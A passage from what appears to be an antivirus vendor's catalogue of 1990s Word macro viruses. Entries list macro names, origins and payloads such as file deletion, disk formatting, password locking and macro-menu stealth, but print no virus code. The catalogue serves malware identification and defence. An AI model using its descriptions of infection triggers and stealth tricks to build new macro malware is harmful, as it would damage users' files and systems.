  19429. Size of macros: 610 Bytes
  19430. Place of origin: USA
  19431. Date of origin: Summer 1996
  19432. Destructive: No
  19433. Common In-The-Wild: No
  19434. Description:
  19435.  
  19436. Doggie infects the global template (normal.dot) when an
  19437. infected document is opened. Further documents become
  19438. infected with the "FileSaveAs" command.
  19439.  
  19440. Doggie is one of the very few non-destructive macro viruses.
  19441. It only infects other files and displays the following message:
  19442.  
  19443.  
  19444. "    Doggie   "
  19445.  
  19446.  
  19447. [WORD_Drugs.A:De]
  19448. Virus name: WORD_Drugs.A:De
  19449. Virus Type: Word macro virus
  19450. Number of macros: 9
  19451. Encrypted: Yes
  19452. Macro names: AutoOpen, Dateidrucken, DateidruckenStandard,
  19453.              DateiSpeichern, DateiSpeichernUnter, DateiSchliessen,
  19454.              DokumentSchliessen, DateiDokVorlagen, ExtrasMakro
  19455. Size of macros: 8013 Bytes
  19456. Place of origin: Germany
  19457. Date of origin: March 1997
  19458. Destructive: Yes
  19459. Seen In-The-Wild: No
  19460. Description:
  19461.  
  19462. Drugs infects the global template when an infected document is
  19463. opened (AutoOpen).
  19464.  
  19465. Drugs uses language specific commands, therefore it only
  19466. works with the German version of Microsoft Word.
  19467. It uses "ExtrasMakro" and hides DokumentVorlagen to make
  19468. recognition of an infected document more difficult (called
  19469. macro stealth technique).
  19470.  
  19471. Drugs contains several destructive payloads.
  19472.  
  19473. 1. It deletes all *.DLL files in the following directory:
  19474.    C:\WINDOWS\SYSTEM
  19475. 2. It replaces words in documents that are printed:
  19476.    "und" replaced  with "oder"
  19477.    "da▀" with "das"
  19478.    "nΣmlich" with "nΣhmlich"
  19479. 3. It inserts page breaks.
  19480.  
  19481.  
  19482.  
  19483. [WORD_Dub.A]
  19484. Virus name: WORD_Dub.A
  19485. Virus Type: Word macro virus
  19486. Number of macros: 13
  19487. Encrypted: Yes
  19488. Macro names: AutoExec, NewDocInsert, ToolsMacro, FileTemplates
  19489.              FileSaveAs, FcDub, AeDub, Annhilator, Message
  19490.              SearchDestroyer, ExeKiller, KillIt (FileClose)
  19491. Size of macros: 22669 Bytes in Documents
  19492.                 25325 Bytes in global template
  19493. Place of origin: Baku, Azerbaijan
  19494. Date of origin: Spring 1997
  19495. Destructive: Yes
  19496. Seen In-The-Wild: No
  19497. Description:
  19498.  
  19499. When Dub becomes active, it searches the C:\ drive for
  19500. documents (C:\*.DOC). It infects all documents that have the
  19501. Word 6/7 format.
  19502.  
  19503. After each infection, Dub writes a log file where it mentions
  19504. all the killed documents (existing text is replaced with "666").
  19505.  
  19506. Dub.A uses "ToolsMacro" and "FileTemplates" to make
  19507. recognition of an infected document more difficult (called
  19508. macro stealth technique). We advise not to access the two
  19509. menu items, because it will result in the execution of Dubs
  19510. viral code.
  19511.  
  19512. Dub contains various payloads:
  19513.  
  19514. 1. When an infected document is saved (FileSaveAs) at 4:00
  19515.     o'clock, Dub displays the following message:
  19516.  
  19517.     "   Do you believe in Satan?   "
  19518.  
  19519. 2. When Microsoft Word is started (AutoExec) on the 13th of
  19520.    each month, Dub tries to delete the following files:
  19521.    *.EXE.
  19522.  
  19523. 3. Upon infection, all existing text is replaced with " 666 ".
  19524.  
  19525.  
  19526. [WORD_Dzt.A]
  19527. Virus name: WORD_Dzt.A
  19528. Virus Type: Word macro virus
  19529. Alias: WORD_Dzutaq
  19530. Number of Variants: 6
  19531. Number of macros: 2
  19532. Encrypted: Yes
  19533. Macro names: AutoOpen (FileSave), FileSaveAs
  19534. Size of macros: 2033 Bytes
  19535. Place of origin: Indonesia
  19536. Date of origin: April 1996
  19537. Destructive: No
  19538. Common In-The-Wild: Yes
  19539. Description:
  19540.  
  19541. Dzt.A activates when an infected document is opened
  19542. (AutoOpen).  Further documents become infected when they
  19543. are saved with the "FileSave" and "FileSaveAs" commands.
  19544.  
  19545. When infecting a document, Dzt.A adds the following text to
  19546. the Comments section of File|Properties:
  19547.  
  19548. "   DZT   "
  19549.  
  19550.  
  19551. [WORD_Dzutaq]
  19552. Virus name: WORD_Dzutaq
  19553. Virus Type: Word macro virus
  19554. Alias: WORD_Dzt.A
  19555. Number of Variants: 6
  19556. Number of macros: 2
  19557. Encrypted: Yes
  19558. Macro names: AutoOpen (FileSave), FileSaveAs
  19559. Size of macros: 2033 Bytes
  19560. Place of origin: Indonesia
  19561. Date of origin: April 1996
  19562. Destructive: No
  19563. Common In-The-Wild: Yes
  19564. Description:
  19565.  
  19566. Dzutaq activates when an infected document is opened
  19567. (AutoOpen).  Further documents become infected when they
  19568. are saved with the "FileSave" and "FileSaveAs" commands.
  19569.  
  19570. When infecting a document, Dzutaq adds the following text to
  19571. the Comments section of File|Properties:
  19572.  
  19573. "   DZT   "
  19574.  
  19575.  
  19576.  
  19577. [WORD_Dzt.B]
  19578. Virus name: WORD_Dzt.B
  19579. Virus Type: Word macro virus
  19580. Number of macros: 1
  19581. Encrypted: Yes
  19582. Macro names: AutoOpen (FileSave)
  19583. Size of macros: 1214 Bytes
  19584. Place of origin: Indonesia
  19585. Date of origin: April 1996
  19586. Destructive: No
  19587. Common In-The-Wild: Yes
  19588. Description:
  19589.  
  19590. Dzt.B activates when an infected document is opened
  19591. (AutoOpen).  Further documents become infected when they
  19592. are saved with the "FileSave" command.
  19593.  
  19594. The main difference between this new variant and the original
  19595. Dzt.A virus is that the "FileSaveAs" macro is missing.
  19596.  
  19597.  
  19598. [WORD_Dzt.C]
  19599. Virus name: WORD_Dzt.C
  19600. Virus Type: Word macro virus
  19601. Number of macros: 1
  19602. Encrypted: Yes
  19603. Macro names: FileSaveAs
  19604. Size of macros: 819 Bytes
  19605. Place of origin: Indonesia
  19606. Date of origin: April 1996
  19607. Destructive: No
  19608. Common In-The-Wild: Yes
  19609. Description:
  19610.  
  19611. The main difference between this new variant and the original
  19612. Dzt.A virus is that the "AutoOpen" macro is missing.
  19613.  
  19614. Dzt.C was most likely created by an older version of a popular
  19615. anti-virus product. The disinfection routine was faulty and
  19616. forgot to remove the "AutoOpen" macro.
  19617.  
  19618.  
  19619. [WORD_Dzt.D]
  19620. Virus name: WORD_Dzt.D
  19621. Virus Type: Word macro virus
  19622. Number of macros: 2
  19623. Encrypted: Yes
  19624. Macro names: AutoOpen (FileSave), FileSaveAs
  19625. Size of macros: 2584 Bytes
  19626. Place of origin: Indonesia
  19627. Date of origin: April 1996
  19628. Destructive: No
  19629. Common In-The-Wild: No
  19630. Description:
  19631.  
  19632. The main difference between this new variant and the original
  19633. Dzt.A virus is that the comment in the File|Properties
  19634. section was changed from "DZT" to "DZT'96."
  19635.  
  19636. The "FileSaveAs" macro is also partially corrupted.
  19637.  
  19638. For more information, please refer to the Dzt.A virus description.
  19639.  
  19640.  
  19641. [WORD_Easy.A (a.k.a. EasyMan)]
  19642. Virus name: WORD_Easy.A (a.k.a. EasyMan)
  19643. Virus Type: Word macro virus
  19644. Number of macros: 1
  19645. Encrypted: Yes
  19646. Macro names: AutoOpen
  19647. Size of macros: 1090 Bytes
  19648. Place of origin: Austria
  19649. Date of origin: September 1996
  19650. Destructive: Yes
  19651. Common In-The-Wild: No
  19652. Description:
  19653.  
  19654. Easy activates when an infected document is opened
  19655. (AutoOpen). If the "AutoOpen" macro already exists in the
  19656. global template, Easy does not infect.
  19657.  
  19658. The following text will be inserted at the top of an opened
  19659. document at a random date and with a random color:
  19660.  
  19661. "   It's Easy Man   "
  19662.  
  19663. After that Easy displays the following text at the status bar:
  19664.  
  19665. "   WORD_EasyMan, written by Spooky   "
  19666.  
  19667.  
  19668. [WORD_Epidemic.A]
  19669. Virus name: WORD_Epidemic.A
  19670. Virus Type: Word macro virus
  19671. Number of macros: 2
  19672. Encrypted: Yes
  19673. Macro names: AutoOpen, AutoExec
  19674. Size of macros: 38746 Bytes
  19675. Place of origin: Taiwan
  19676. Date of origin: January 1997
  19677. Destructive: Yes
  19678. Common In-The-Wild: No
  19679. Description:
  19680.  
  19681. When an infected document is opened, Epidemic infects the
  19682. global template (normal.dot). Further documents become
  19683. infected when they are opened (AutoOpen) or Microsoft Word is
  19684. started (AutoExec).
  19685.  
  19686. Epidemic has various destructive payloads:
  19687.  
  19688. 1. On April 27, Epidemic formats the hard disk (similar to FormatC).
  19689. 2. On June 17, it uses DEBUG.EXE to drop the Dos-based virus
  19690.    "Natas" into the C:\MOUSE.COM file. It also modifies
  19691.    C:\AUTOEXEC.BAT to call C:\MOUSE.COM upon the next boot-up.
  19692. 3. On October 10, it deletes the following files:
  19693.    "   C:\IO.SYS   "
  19694.    "   C:\MSDOS.SYS   "
  19695.    "   C:\COMMAND.COM   "
  19696.  
  19697.    This action will leave the computer unbootable.
  19698.  
  19699. It then displays the following message:
  19700.  
  19701. "   EPIDEMIC  Macro  Virus  V1.1   "
  19702.  
  19703. Epidemic only works with the Chinese version of Microsoft Word.
  19704.  
  19705.  
  19706. [WORD_Trojan.FormatC (a.k.a. TrojanFormat)]
  19707. Virus name: WORD_Trojan.FormatC (a.k.a. TrojanFormat)
  19708. Virus Type: Word macro virus
  19709. Number of macros: 1
  19710. Encrypted: No
  19711. Macro names: AutoOpen
  19712. Size of macros: 81 Bytes
  19713. Place of origin: Posted to Usenet
  19714. Date of origin: Unknown
  19715. Destructive: Yes
  19716. Common In-The-Wild: No
  19717. Description:
  19718.  
  19719. FormatC is not a virus but a trojan horse, which does not
  19720. replicate.
  19721.  
  19722. When an infected document is opened, the trojan triggers the
  19723. destructive payload, which types " Format C: /U " in a minimized
  19724. DOS box and then formats the C drive.
  19725.  
  19726. FormatC is very unlikely to spread since it does not infect
  19727. other files.
  19728.  
  19729.  
  19730. [WORD_Friendly.A:De]
  19731. Virus name: WORD_Friendly.A:De
  19732. Virus Type: Word macro virus
  19733. Number of macros: 20
  19734. Encrypted: No
  19735. Macro names: Abbrechen, AutoExec, AutoOpen, Cancel,
  19736.              DateiBeenden, DateiNeu, DateiOeffnen,
  19737.              DateiSchliessen, DateiSpeichern,
  19738.              DateiSpeichernUnter, ExtrasMacro,
  19739.              ExtrasMakro, Fast, FileExit, FileNew, FileOpen,
  19740.              FileSave, FileSaveAs, Infizieren, Talk
  19741. Size of macros: 9867 Bytes
  19742. Place of origin: Germany
  19743. Date of origin: May 1996
  19744. Destructive: Yes
  19745. Common In-The-Wild: No
  19746. Description:
  19747.  
  19748. Friendly was an effort to write a virus for more than one
  19749. language, yet due to some wrong translations (ExtrasMacro
  19750. instead of ToolsMacro) Friendly does not work with other
  19751. versions than the German version of Microsoft WORD_
  19752.  
  19753. Friendly tries to infect the global template (normal.dot) when
  19754. an infected document is opened. It checks the global template
  19755. for a previous infection by looking for the text "Friendly",
  19756. Author = Nightmare". After the macros have been transferred the
  19757. destructive payload is called from the "Fast" macro.
  19758.  
  19759. Friendly infects other documents whenever new ones are created,
  19760. an action is canceled, and whenever documents are opened,
  19761. closed, saved, or exited from Word. Friendly does not check
  19762. for a previous document infection. It simply overwrites existing
  19763. macros.
  19764.  
  19765. The destructive payload, inside the "Fast" macro, is called
  19766. when the system clock has a second value smaller than 2.
  19767. Friendly then creates a debug script inside the C:\DOS
  19768. directory and executes the DOS DEBUG.EXE command. In
  19769. addition, Friendly adds an entry into AUTOEXEC.BAT, so the
  19770. DOS based virus is started after the next boot-up. The DOS
  19771. based virus inside Friendly has a size of 395 Bytes and is a
  19772. memory resident companion virus encrypted with CryptCOM.
  19773.  
  19774. Friendly displays the following message on January 1:
  19775.  
  19776. "   Ein gutes neues Jahr !   "
  19777.  
  19778. and infects EXE files upon execution. COM files are created
  19779. with the same name as EXE files and with the attributes "READ-ONLY"
  19780. and "HIDDEN."
  19781.  
  19782. If the virus is active, the following text is displayed when users
  19783. try to display the macro list:
  19784.  
  19785. "You can't do that!"
  19786. "I'm very anxious!"
  19787. "Hello my friend!"
  19788. "<< Friends >> Virus"
  19789.  
  19790. (translated:)
  19791.  
  19792. "Du kannst das nicht tun!"
  19793. "Ich bin sehr aengstlich!"
  19794. "Hallo mein Freund!"
  19795. "<< Friends >> Virus"
  19796.  
  19797. After May 1, Friendly displays the following text when
  19798. infecting documents for the first time (except for NORMAL.DOT).
  19799.  
  19800. "Hallo mein Freund!"
  19801. "Ich bin der << Friends >> Virus und wie heißt du?"
  19802. "Gib doch bitte anschließend unten deinen Namen ein:"
  19803. "Also ..... ich habe eine gute und eine schlechte Nachricht fuer
  19804. dich!"
  19805. "Die schlechte Nachricht ist, daß ich mich auf deiner Platte
  19806. eingenistet"
  19807. "habe und die gute ist, daß ich aber ein freundlicher und auch
  19808. nuetzlicher"
  19809. "Virus bin. Druecke bitte OK fuer Weiter!"
  19810. "Wenn du mich nicht killst, dann fuege ich ein Programm in deine"
  19811. "Autoexec.bat ein, daß deine lame Tastatur etwas auf Touren bringt."
  19812. "Also ...., gib dir einen Ruck und kill mich nicht. Goodbye!"
  19813.  
  19814. (translated:)
  19815.  
  19816. "Hello my Friend!"
  19817. "I'm the << Friends >> Virus and how are you?"
  19818. "Can you give me your name, please?"
  19819. "Hello .... I have a good and a bad message for you! The bad message is
  19820. that"
  19821. "you have now a Virus on your Harddisk and the good message is that
  19822. I'm"
  19823. "harmless and useful. Press OK!"
  19824.  
  19825. "If you don't kill me, I will insert a programme in your AutoExec.bat
  19826. thats"
  19827. "your Keyboard accelerated. Please .... don't kill me. Goodbye!"
  19828.  
  19829. The entered name will then be displayed.
  19830.  
  19831.  
  19832. [WORD_Fury.A (a.k.a. Greenfury)]
  19833. Virus name: WORD_Fury.A (a.k.a. Greenfury)
  19834. Virus Type: Word macro virus
  19835. Number of macros: 4
  19836. Encrypted: Yes
  19837. Macro names:  GreenFury, GGGFFF (FileSalvaConNome), FFFGGG, AutoOpen
  19838. Size of macros:  2322
  19839. Place of origin: Unknown
  19840. Date of origin: Unknown
  19841. Destructive: Yes
  19842. Seen In-The-Wild: No
  19843. Description:
  19844.  
  19845. Fury is another virus that only works with the Italian version of
  19846. Microsoft Word.
  19847.  
  19848. Fury infects the global template (normal.dot) when an infected
  19849. document is opened. Further documents become infected when
  19850. they are saved with the "FileSalvaConNome --> translated:
  19851. FileSaveAs" command.
  19852.  
  19853. When Fury is loaded from a non-Italian Word version, it deletes
  19854. all files in the current directory.
  19855.  
  19856. Fury also sets a random password to the active document.
  19857.  
  19858.  
  19859. [WORD_FutureNot.A (a.k.a. Anti-IVX, Future)]
  19860. Virus name: WORD_FutureNot.A (a.k.a. Anti-IVX, Future)
  19861. Virus Type: Word macro virus
  19862. Number of macros: 1 or 2 (in global template)
  19863. Encrypted: No
  19864. Macro names: AutoOpen (FileSaveAs)
  19865. Size of macros: Polymorphic
  19866. Place of origin: Unknown
  19867. Date of origin: 1997
  19868. Destructive: No
  19869. Common In-The-Wild: No
  19870. Description:
  19871.  
  19872. FutureNot is the first polymorphic macro virus.
  19873.  
  19874. When an infected document is opened, FutureNot infects the
  19875. global template. It creates two macros in the global template.
  19876. One is always "FileSaveAs" and the second one is a copy of
  19877. "AutoOpen" with a randomly chosen name.
  19878.  
  19879. While the second macro remains the same, the FileSaveAs
  19880. macro changes due to randomly selected comments.
  19881.  
  19882. FutureNot also modifies the C:\AUTOEXEC.BAT file. It adds
  19883. the following comment at the end of the file:
  19884.  
  19885. "    @ATTRIB -R C:\MSOFFICE\WINWORD\TEMPLATE\NORMAL.DOT > NUL   "
  19886.  
  19887. This clears the Read-Only attribute from the global template.
  19888.  
  19889.  
  19890. [WORD_Gangsterz.A (a.k.a Big Daddy Cool, Daddy)]
  19891. Virus name: WORD_Gangsterz.A (a.k.a Big Daddy Cool, Daddy)
  19892. Virus Type: Word macro virus
  19893. Number of macros: 2
  19894. Encrypted: Yes
  19895. Macro names: Gangsterz, Paradise
  19896. Size of macros: 4250 Bytes
  19897. Place of origin: Germany
  19898. Date of origin: Unknown
  19899. Payload: Yes
  19900. Seen In-The-Wild: No
  19901. Description:
  19902.  
  19903. Gangsterz uses a new triggering mechanism. Instead of using
  19904. automatic macros (AutoOpen, etc.) or redefining built-in Word
  19905. commands, it uses assigned keys to start up its macros.
  19906.  
  19907. The "Gangsterz" macro is associated with pressing space and
  19908. the "Paradise" macro with pressing "e." If a user presses any of
  19909. the two keys while working on an infected document, the
  19910. associated macros are activated.
  19911.  
  19912. If a document is infected on January 1, a new document is
  19913. created with the following text:
  19914.  
  19915. "   Big_Daddy_Cool virus generated by NJ   "
  19916.  
  19917. and then filled with scrolling O's.
  19918.  
  19919. If the value of the XOP setting in the [intl] section of win.ini is
  19920. not set to "Installed", Gangsterz drops an intended batch file
  19921. (XOP.bat) virus after activation. It adds a line to the C:\AUTOEXEC.BAT
  19922. file to start the virus.
  19923.  
  19924.  
  19925. [WORD_Goldfish.A (a.k.a Fishfood)]
  19926. Virus name: WORD_Goldfish.A (a.k.a Fishfood)
  19927. Virus Type: Word macro virus
  19928. Number of macros: 2
  19929. Encrypted: Yes
  19930. Macro names: AutoOpen, AutoClose
  19931. Size of macros: 9867 Bytes
  19932. Place of origin: USA
  19933. Date of origin: July 1996
  19934. Destructive: No
  19935. Common In-The-Wild: No
  19936. Description:
  19937.  
  19938. Goldfish infects the global template (normal.dot) when an
  19939. infected document is opened. Further documents become
  19940. infected when they are also opened ("AutoOpen").
  19941. Goldfish is one of the very few non-destructive macro viruses. It
  19942. only infects other files and displays the following message:
  19943.  
  19944. "   I am the goldfish, I am hungry, feed me.  "
  19945.  
  19946. The message will not go away until the user types in an
  19947. acceptable response. Available answers are:
  19948.  
  19949. "fishfood"
  19950. "worms"
  19951. "worm"
  19952. "pryme"
  19953. "core"
  19954.  
  19955.  
  19956. [WORD_GoodNight.A]
  19957. Virus name: WORD_GoodNight.A
  19958. Virus Type: Word macro virus
  19959. Number of macros: 10
  19960. Encrypted: No
  19961. Macro names: Exit, AutoExec, AutoExit, AutoOpen,
  19962.              FileOpen, FileSave, AutoClose, FileClose
  19963.              FileSaveAs, FileCloseAll
  19964. Size of macros: 4992 Bytes
  19965. Place of origin: Unknown
  19966. Date of origin: Spring 1997
  19967. Payload: Yes
  19968. Seen In-The-Wild: Yes
  19969. Description:
  19970.  
  19971. GoodNight.A infects the global template (normal.dot) when an
  19972. infected document is opened. Further documents become
  19973. infected when they are closed (AutoClose, FileClose, AutoExit,
  19974. and FileCloseAll) or saved (FileSave and FileSaveAs).
  19975.  
  19976. When GoodNight triggers, it tries to exit Microsoft WORD_
  19977.  
  19978. GoodNight.A devolves into GoodNight.A1 (9 macros with 4431
  19979. Bytes) and then into GoodNight.A2 (6 macros with 2763 Bytes).
  19980. GoodNight.A2 is not capable of spreading any further, it does
  19981. not infect any other documents.
  19982.  
  19983.  
  19984. [WORD_Haggis.A]
  19985. Virus name: WORD_Haggis.A
  19986. Virus Type: Word macro virus
  19987. Number of macros: 1
  19988. Encrypted: Yes
  19989. Macro names: AutoOpen
  19990. Size of macros: 300 Bytes
  19991. Place of origin: Unknown
  19992. Date of origin: Spring 1997
  19993. Payload: Yes
  19994. Seen In-The-Wild: No
  19995. Description:
  19996.  
  19997. Haggis infects the global template when an infected document is
  19998. opened. Further documents become infected when they are also
  19999. opened (AutoOpen).
  20000.  
  20001. Haggis removes "ToolsMacro" to make recognition of an
  20002. infected document more difficult (called macro stealth
  20003. technique).
  20004.  
  20005. When Haggis triggers, it sets the password "   Haggis   " to
  20006. the active document.
  20007.  
  20008. If you find a document with an unknown password, please
  20009. download a copy of WinWord Password Recovery Tool
  20010. (wwprt). It is available at: www.vdsarg.com.
  20011.  
  20012.  
  20013. [WORD_Hassle.a (a.k.a Bogus)]
  20014. Virus name: WORD_Hassle.a (a.k.a Bogus)
  20015. Virus Type: Word macro virus
  20016. Number of macros: 7
  20017. Encrypted: Yes
  20018. Macro names: AutoClose, Toolsmacro, Microsoft01, Microsoft02,
  20019.              Microsoft03, Microsoft04, Microsoft05
  20020. Size of macros: 8283 Bytes
  20021. Place of origin: USA
  20022. Date of origin: August 1996
  20023. Destructive: No
  20024. Common In-The-Wild: No
  20025. Description:
  20026.  
  20027. Hassle is another virus that uses the macro "ToolsMacro" to
  20028. make recognition of an infected document more difficult
  20029. (called macro stealth technique).
  20030.  
  20031. If the user selects any command, it will show the following
  20032. message and close Microsoft Word:
  20033.  
  20034. "   Out of Memory or System Resources   "
  20035.  
  20036. Hassle is one of the very few non-destructive macro viruses. It
  20037. only infects other files and displays the following text window:
  20038.  
  20039. "   Are you sure to Quit?   "
  20040.  
  20041. This only happens seldomly, with a 5% probability.
  20042.  
  20043. Another payload asks the user to register a software with Microsoft.
  20044. Hassle will only accept:
  20045.  
  20046. "Bill Gates", "Microsoft" and "666"
  20047.  
  20048. Whenever the user selects the Tools/Macro command, Hassle
  20049. will display the following text at the bottom of the screen:
  20050.  
  20051. "   Microsoft Word Assistant Version 6.2   "
  20052.  
  20053.  
  20054. [WORD_Hellga.A (a.k.a DNZ, Hellgate)]
  20055. Virus name: WORD_Hellga.A (a.k.a DNZ, Hellgate)
  20056. Virus Type: Word macro virus
  20057. Number of macros: 10
  20058. Encrypted: Yes
  20059. Macro names: AutoClose, DnZ, EditCut, EditCopy, FileNew,
  20060.              FileExit, FileTemplates, ToolsSpelling, ToolsMacro,
  20061.              ToolsCustomize
  20062. Size of macros: 2498 Bytes
  20063. Place of origin: Unknown
  20064. Date of origin: Unknown
  20065. Payload: Yes
  20066. Seen In-The-Wild: No
  20067. Description:
  20068.  
  20069. Hellga infects whenever the "DnZ" macro is called from one of
  20070. the virus macros. It then infects the global template (normal.dot)
  20071. and further documents. Hellga also adds the setting "Program=
  20072. Installed" to the [Demo] section of win.ini (Windows directory).
  20073.  
  20074. The following message is displayed on March 9 of each year:
  20075.  
  20076. "   WM.DnZ   "
  20077. "   Written by Bill_HellGateS   "
  20078.  
  20079.  
  20080. [WORD_Helper.A]
  20081. Virus name: WORD_Helper.A
  20082. Virus Type: Word macro virus
  20083. Number of macros: 1
  20084. Encrypted: Yes
  20085. Macro names: AutoClose
  20086. Size of macros: 409 Bytes
  20087. Place of origin: Unknown
  20088. Date of origin: Unknown
  20089. Payload: Yes
  20090. Seen In-The-Wild: Yes
  20091. Description:
  20092.  
  20093. Helper infects the global template (normal.dot) when an infected
  20094. document is closed. Further documents become infected when
  20095. they are also closed.
  20096.  
  20097. When a document is closed on the 10th of each month, Helper
  20098. triggers its destructive payload. It sets the following password
  20099. to the saved document:
  20100.  
  20101. "   help   "
  20102.  
  20103.  
  20104. [WORD_Helper.B]
  20105. Virus name: WORD_Helper.B
  20106. Virus Type: Word macro virus
  20107. Number of macros: 1
  20108. Encrypted: Yes
  20109. Macro names: AutoClose
  20110. Size of macros: 409 Bytes
  20111. Place of origin: Unknown
  20112. Date of origin: 1997
  20113. Payload: No
  20114. Seen In-The-Wild: Yes
  20115. Description:
  20116.  
  20117. Helper.B infects the global template (normal.dot) when an
  20118. infected document is closed. Further documents become
  20119. infected when they are also closed.
  20120.  
  20121. The main difference between this new variant and the original
  20122. Helper.A virus is that the payload routine has been modified.
  20123. Due to a mistake, Helper.B does not save any documents with
  20124. the "help" passWORD_
  20125.  
  20126.  
  20127. [WORD_Helper.C]
  20128. Virus name: WORD_Helper.C
  20129. Virus Type: Word macro virus
  20130. Number of macros: 1
  20131. Encrypted: Yes
  20132. Macro names: AutoClose
  20133. Size of macros: 410 Bytes
  20134. Place of origin: Europe
  20135. Date of origin: April 1997
  20136. Payload: No
  20137. Seen In-The-Wild: No
  20138. Description:
  20139.  
  20140. Helper.C infects the global template (normal.dot) when an
  20141. infected document is closed. Further documents become
  20142. infected when they are also closed.
  20143.  
  20144. The main difference between this new variant and the original
  20145. Helper virus is that someone tried to change the trigger date
  20146. and the password.
  20147.  
  20148. Helper.C does not trigger its payload since one important
  20149. change in its code is missing.
  20150.  
  20151.  
  20152. [WORD_Helper.D]
  20153. Virus name: WORD_Helper.D
  20154. Virus Type: Word macro virus
  20155. Number of macros: 1
  20156. Encrypted: Yes
  20157. Macro names: AutoClose
  20158. Size of macros: 412 Bytes
  20159. Place of origin: Europe
  20160. Date of origin: April 1997
  20161. Payload: No
  20162. Seen In-The-Wild: No
  20163. Description:
  20164.  
  20165. Helper.D infects the global template (normal.dot) when an
  20166. infected document is closed. Further documents become
  20167. infected when they are also closed.
  20168.  
  20169. The main difference between this new variant and the original
  20170. Helper virus is that someone tried to change the trigger date
  20171. and the password.
  20172.  
  20173. Helper.D does not trigger its payload since one important
  20174. change in its code is missing.
  20175.  
  20176.  
  20177. [WORD_Helper.E]
  20178. Virus name: WORD_Helper.E
  20179. Virus Type: Word macro virus
  20180. Number of macros: 1
  20181. Encrypted: Yes
  20182. Macro names: AutoClose
  20183. Size of macros: 416 Bytes
  20184. Place of origin: Europe
  20185. Date of origin: April 1997
  20186. Payload: No
  20187. Seen In-The-Wild: No
  20188. Description:
  20189.  
  20190. Helper.E infects the global template (normal.dot) when an
  20191. infected document is closed. Further documents become
  20192. infected when they are also closed.
  20193.  
  20194. The main difference between this new variant and the original
  20195. Helper virus is that someone tried to change the trigger date
  20196. and the password.
  20197.  
  20198. Helper.E does not trigger its payload since one important
  20199. change in its code is missing.
  20200.  
  20201.  
  20202. [WORD_Hiac.A]
  20203. Virus name: WORD_Hiac.A
  20204. Virus Type: Word macro virus
  20205. Number of macros: 2
  20206. Encrypted: Yes
  20207. Macro names: AutoClose, HI (AC)
  20208. Size of macros: 576 Bytes
  20209. Place of origin: Australia
  20210. Date of origin: Spring 1997
  20211. Destructive: No
  20212. Common In-The-Wild: Yes
  20213. Description:
  20214.  
  20215. Hiac.A is another "do nothing" virus that does nothing
  20216. else besides infecting other files. Infection occurs
  20217. when a user closes a document (AutoClose).
  20218.  
  20219. Its code is faulty and the template bit of infected documents
  20220. is not set, therefore it is unlikely to spread its
  20221. code to other files.
  20222.  
  20223.  
  20224. [WORD_Hot.A]
  20225. Virus name: WORD_Hot.A
  20226. Virus Type: Word macro virus
  20227. Number of macros: 4
  20228. Encrypted: Yes
  20229. Macro names: AutoOpen, DrawBringInFrOut, InsertPBreak,
  20230.              ToolsRepaginat, FileSaveAs, StartOfDoc
  20231. Size of macros: 5515 Bytes
  20232. Place of origin: Unknown
  20233. Date of origin: January 1996
  20234. Destructive: Yes
  20235. Common In-The-Wild: Yes
  20236. Description:
  20237.  
  20238. When an infected document is opened the virus is activated by
  20239. the AutoOpen macro. Some replicated Hot samples also display
  20240. the following error message:
  20241.  
  20242. "   Unable to load the specified library   "
  20243.  
  20244. Hot turns off the prompting of Word to ensure a hidden
  20245. infection of the global template (normal.dot). It also checks
  20246. the file "WINWORD6.INI" for the following entry: "QLHot".
  20247. If not present, Hot records a "hot date", 14 days in the future.
  20248. If this variable is not already set, the global template becomes
  20249. infected.
  20250.  
  20251. The InsertPBreak/InsertPageBreak inserts a page-break into the
  20252. current document. However, it is also used by the virus to
  20253. determine whether or not a document is already infected.
  20254.  
  20255. Some of the macros are renamed when they are copied by the
  20256. WordBasic "MacroCopy" command:
  20257.  
  20258. "AutoOpen"          becomes  "StartOfDoc"
  20259. "DrawBringInFrOut"  becomes  "AutoOpen"
  20260. "InsertPBreak"      becomes  "InsertPageBreak"
  20261. "ToolsRepaginat"    becomes  "FileSave"
  20262.  
  20263. In addition, the global template contains the following macros:
  20264.  
  20265. "FileSave" (similar to "ToolsRepaginat")
  20266. "StartOfDoc" (similar to "AutoOpen")
  20267.  
  20268. Hot also uses special functions from the Windows file
  20269. "KERNEL.EXE" (Win API). It uses the API to find the path to
  20270. Windows and to open files with simple functions.
  20271. It should be noted that many other options were available to
  20272. the virus author.
  20273.  
  20274. The destructive payload, which is reached upon arrival of the
  20275. hot date" set under the "QLHot" section in the WINWORD6.ini
  20276. file, deletes text from the current active document. This
  20277. payload is bypassed if the file EGA5.CPI is present in the
  20278. "C:\DOS" directory.
  20279.  
  20280. A comment in the virus source code suggests that this is a
  20281. "feature" designed to protect the virus author and his friends.
  20282.  
  20283.  
  20284. [WORD_Hunter.A:De (a.k.a. Headhunter V 3.0)]
  20285. Virus name: WORD_Hunter.A:De (a.k.a. Headhunter V 3.0)
  20286. Virus Type: Word macro virus
  20287. Number of macros: 3
  20288. Encrypted: Yes
  20289. Macro names: AutoOpen, DateiNeu, ExtrasMakro
  20290. Size of macros: 1051 Bytes
  20291. Place of origin: Germany
  20292. Date of origin: Spring 1997
  20293. Payload: Yes
  20294. Seen In-The-Wild: No
  20295. Description:
  20296.  
  20297. Hunter.A does not infect the global template. It saves an
  20298. infected document to the Word STARTUP directory
  20299. (WINWORD.DOT), which is used to infect new documents
  20300. when they are created (DateiNeu - translated: FileNew).
  20301.  
  20302. Hunter.A uses "ExtrasMakro" to make recognition of an
  20303. infected document more difficult (called macro stealth technique).
  20304.  
  20305. When Hunter.A triggers (probability of 1/60), it displays the
  20306. following message:
  20307.  
  20308. "   One - You lock the target   "
  20309. "   Two - You bait the line    "
  20310. "   Three - You slowly spread the net   "
  20311. "   And Four - You catch the man   "
  20312.  
  20313. Hunter.A uses language specific macros, therefore it only works
  20314. with the German version of Microsoft Word.
  20315.  
  20316.  
  20317. [WORD_Hunter.B:De (aka Headhunter V 3.1)]
  20318. Virus name: WORD_Hunter.B:De (aka Headhunter V 3.1)
  20319. Virus Type: Word macro virus
  20320. Number of macros: 3
  20321. Encrypted: Yes
  20322. Macro names: AutoOpen, DateiNeu, ExtrasMakro
  20323. Size of macros: 1126 Bytes
  20324. Place of origin: Germany
  20325. Date of origin: Spring 1997
  20326. Payload: Yes
  20327. Seen In-The-Wild: No
  20328. Description:
  20329.  
  20330. The main difference between this new variant and the previous
  20331. Hunter.A virus is that Hunter.B contains some modified codes.
  20332.  
  20333. Hunter.B does not infect the global template. It saves an
  20334. infected document to the Word STARTUP directory
  20335. (WINWORD_DOT), which is used to infect new documents
  20336. when they are created (DateiNeu - translated: FileNew).
